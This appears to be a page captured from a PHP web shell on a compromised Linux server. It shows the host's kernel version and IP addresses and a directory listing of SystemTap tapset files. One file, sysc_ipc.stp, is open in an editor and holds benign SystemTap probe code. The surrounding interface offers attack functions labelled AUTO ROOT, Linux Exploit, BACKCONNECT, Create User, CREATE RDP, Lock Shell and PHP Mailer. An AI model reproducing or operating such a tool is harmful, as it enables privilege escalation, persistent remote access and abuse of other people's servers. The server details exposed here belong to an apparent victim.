Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
tapset /
linux /
s390 /
[ HOME SHELL ]
Name
Size
Permission
Action
aux_syscalls.stp
5.41
KB
-rw-r--r--
sysc_compat_fadvise64.stp
6.43
KB
-rw-r--r--
sysc_compat_fallocate.stp
3.14
KB
-rw-r--r--
sysc_compat_ftruncate64.stp
1.78
KB
-rw-r--r--
sysc_compat_lookup_dcookie.stp
3.02
KB
-rw-r--r--
sysc_compat_readahead.stp
1.87
KB
-rw-r--r--
sysc_compat_truncate64.stp
1.83
KB
-rw-r--r--
sysc_execve.stp
4.66
KB
-rw-r--r--
sysc_getresgid16.stp
1.78
KB
-rw-r--r--
sysc_getresuid16.stp
1.66
KB
-rw-r--r--
sysc_ipc.stp
1.39
KB
-rw-r--r--
sysc_mmap.stp
3.22
KB
-rw-r--r--
sysc_mmap2.stp
3.06
KB
-rw-r--r--
sysc_sigaltstack.stp
2.97
KB
-rw-r--r--
sysc_sysctl32.stp
1.12
KB
-rw-r--r--
syscall_num.stp
51.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sysc_ipc.stp
%( systemtap_v < "2.7" %? # sys32_ipc() is just a syscall multiplexer (similar to # sys_socketcall()). So, we don't really need to probe it, since we'll # be probing what sys32_ipc() will call (semget, msgsnd, msgrcv, # shmat, etc.). # ipc _________________________________________________ # long sys32_ipc(u32 call, int first, int second, int third, u32 ptr) # @define _SYSCALL_IPC_NAME %( name = "ipc" %) @define _SYSCALL_IPC_ARGSTR %( argstr = sprintf("%d, %d, %d, %d, %p", call, first, second, third, ptr) %) probe syscall.ipc = dw_syscall.ipc !, nd_syscall.ipc ? {} probe syscall.ipc.return = dw_syscall.ipc.return !, nd_syscall.ipc.return ? {} # dw_ipc _____________________________________________________ probe dw_syscall.ipc = kernel.function("sys32_ipc") ? { @_SYSCALL_IPC_NAME call = $call first = $first second = $second third = $third ptr = $ptr @_SYSCALL_IPC_ARGSTR } probe dw_syscall.ipc.return = kernel.function("sys32_ipc").return ? { @_SYSCALL_IPC_NAME @SYSC_RETVALSTR($return) } # nd_ipc _____________________________________________________ probe nd_syscall.ipc = kprobe.function("sys32_ipc") ? { @_SYSCALL_IPC_NAME asmlinkage() call = uint_arg(1) first = int_arg(2) second = int_arg(3) third = int_arg(4) ptr = uint_arg(5) @_SYSCALL_IPC_ARGSTR } probe nd_syscall.ipc.return = kprobe.function("sys32_ipc").return ? { @_SYSCALL_IPC_NAME @SYSC_RETVALSTR(returnval()) } %)
Close